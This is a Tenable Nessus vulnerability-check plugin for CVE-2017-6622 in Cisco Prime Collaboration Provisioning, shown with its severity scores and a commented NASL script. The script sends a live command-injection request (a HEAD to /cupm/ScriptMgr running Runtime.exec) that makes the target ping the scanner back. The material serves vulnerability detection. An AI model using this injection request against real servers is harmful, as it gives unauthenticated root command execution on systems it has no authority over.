nessus — This script is Copyright (C) 2017-2019 Tenable Network Security, Inc. — CISCO_PRIME_CP_CVE-2017-6622.NASL
History: Jul 13, 2017 - 12:00 a.m.

Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE

2017-07-13 00:00:00
This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.
www.tenable.com

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.806

Percentile

98.4%

The remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges.

Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  # Plugin registration pass: this branch only records metadata and then
  # exits (see exit(0) at the end), so the check logic further down never
  # runs in this pass.
  script_id(101531);
  script_version("1.6");
  script_cvs_date("Date: 2019/03/06 18:38:55");

  # Cross-references for the same issue: CVE, BugTraq id, Cisco bug id and
  # advisory id, and the ZDI advisory.
  script_cve_id("CVE-2017-6622");
  script_bugtraq_id(98520);
  script_xref(name:"CISCO-BUG-ID", value:"CSCvc98724");
  script_xref(name:"CISCO-SA", value:"cisco-sa-20170517-pcp1");
  script_xref(name:"ZDI", value:"ZDI-17-445");

  script_name(english:"Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE");
  script_summary(english:"Attempts to perform a remote command injection.");

  script_set_attribute(attribute:"synopsis", value:
"The remote network management server is affected by a remote command
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Cisco Prime Collaboration Provisioning server is affected
by a remote command execution vulnerability in the ScriptMgr servlet
due to a failure to restrict the HTTP HEAD method. An unauthenticated,
remote attacker can exploit this to bypass authentication and execute
arbitrary commands with root privileges.

Note that the remote Cisco Prime Collaboration Provisioning server is
reportedly affected by additional vulnerabilities; however, Nessus has
not tested for these.");
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e00b5d5b");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-445/");
  # The only remediation offered is a version upgrade; there is no
  # workaround recorded here.
  script_set_attribute(attribute:"solution", value:
"Upgrade to Cisco Prime Collaboration Provisioning version 12.1 or
later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/05/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration_provisioning");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration");
  # The verdict comes from a live exploitation attempt (see the summary
  # above), not from a version comparison.
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # ACT_ATTACK: this plugin sends an active probe to the target rather than
  # inspecting banners or versions.
  script_category(ACT_ATTACK);
  script_family(english:"CISCO");

  script_copyright(english:"This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.");

  # Runs only after the detection plugin has populated the version key for
  # this host; the key is re-checked at the top of the check logic below.
  script_dependencies("cisco_prime_collaboration_provisioning_detect.nbin");
  script_require_keys("Host/Cisco/PrimeCollaborationProvisioning/version");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Make sure pcp is detected
# Stop unless the detection plugin named in script_dependencies recorded a
# Prime Collaboration Provisioning version for this host.
get_kb_item_or_exit("Host/Cisco/PrimeCollaborationProvisioning/version");

port = get_http_port(default:443);

# Vulnerable ScriptMgr servlet is reached through mod_jk 
# Gate on the Server header advertising Apache with mod_jk; any other
# banner is reported as not vulnerable and no probe is sent (audit()
# presumably ends the plugin run here, as the later bpf_open check relies
# on the same behaviour).
banner = get_http_banner(port:port);
if (banner !~ "Server:.*Apache.*mod_jk")
{
  audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}

# Marker for the out-of-band callback: the first 16 characters of this
# plugin's own name. It is placed in the ICMP payload (ping -p takes the
# pattern as hex, hence hexstr) so the listener below can attribute an echo
# request to this plugin run instead of to unrelated ICMP traffic.
pat = SCRIPT_NAME;
if(strlen(pat) > 16)
  pat = substr(pat, 0, 15);
  
# The check is blind: nothing is read back from the command. Instead the
# injected command makes the target ping the scanner (compat::this_host(),
# the dst address in the capture filter below) and success is inferred from
# seeing that echo request arrive.
cmd = "ping%20-c%2010%20" + "-p%20" + hexstr(pat) + "%20" + compat::this_host();
# The command is wrapped in a script passed to the ScriptMgr servlet through
# the query string (language=bsh).
qs = 'command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec("' + cmd + '");';
uri = "/cupm/ScriptMgr?" + qs;
# HEAD rather than GET: per the description above, the servlet fails to
# restrict the HEAD method, which is what lets the request through
# without authentication.
method = "HEAD";
# exit_on_fail: a transport-level failure ends the plugin here instead of
# falling through to the verdict below with an empty response.
res = http_send_recv3(
  method        : method,
  item          : uri,
  port          : port,
  exit_on_fail  : TRUE
);

# A 200 status only shows the servlet accepted the request; the verdict
# comes from whether the target pings back within the window below. Any
# other status skips straight to the not-vulnerable branch at the end.
if(res[0] =~ "^HTTP/[0-9]\.[0-9] 200")
{
  # Capture only ICMP echo requests from the scanned host to the scanner.
  filter = "icmp and src " + get_host_ip() + " and dst " + compat::this_host()  +
    " and icmp[icmptype] = icmp-echo";
  bpf = bpf_open(filter);
  if(isnull(bpf)) audit(AUDIT_FN_FAIL, "bpf_open");

  # Listen for up to 5 seconds; the loop body runs at least once.
  # Caveat for anyone reading the result: if ICMP from the target to the
  # scanner is filtered, or the echo arrives after the window, vuln stays
  # unset and the host is reported as not vulnerable. A missing callback is
  # therefore a false negative, not evidence that the fix is applied.
  timeout = 5;
  t  = unixtime();
  repeat
  {
    frame = bpf_next(bpf:bpf);
    # ping back seen: cmd injection succeeded !
    # The marker must appear in the captured frame; an echo request from
    # the host without the marker is not counted.
    if (frame && pat >< frame)
    {
      vuln = TRUE; 
      break; 
    }  
  }until(unixtime() - t > timeout);

  bpf_close(bpf);
}

# vuln is only ever assigned (to TRUE) when the marker was seen; on every
# other path it is never set, and this test relies on an unassigned NASL
# variable presumably evaluating as false.
if(vuln)
{
  # Report the request that triggered the callback as the evidence; the
  # finding is generic because there is no response body to attach.
  req = http_last_sent_request(); 
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    generic     : TRUE,
    request     : make_list(req)
  );
}
else
{
  # Reached both when the servlet did not return 200 and when no marked
  # echo request was captured within the timeout.
  audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS

0.806

Percentile

98.4%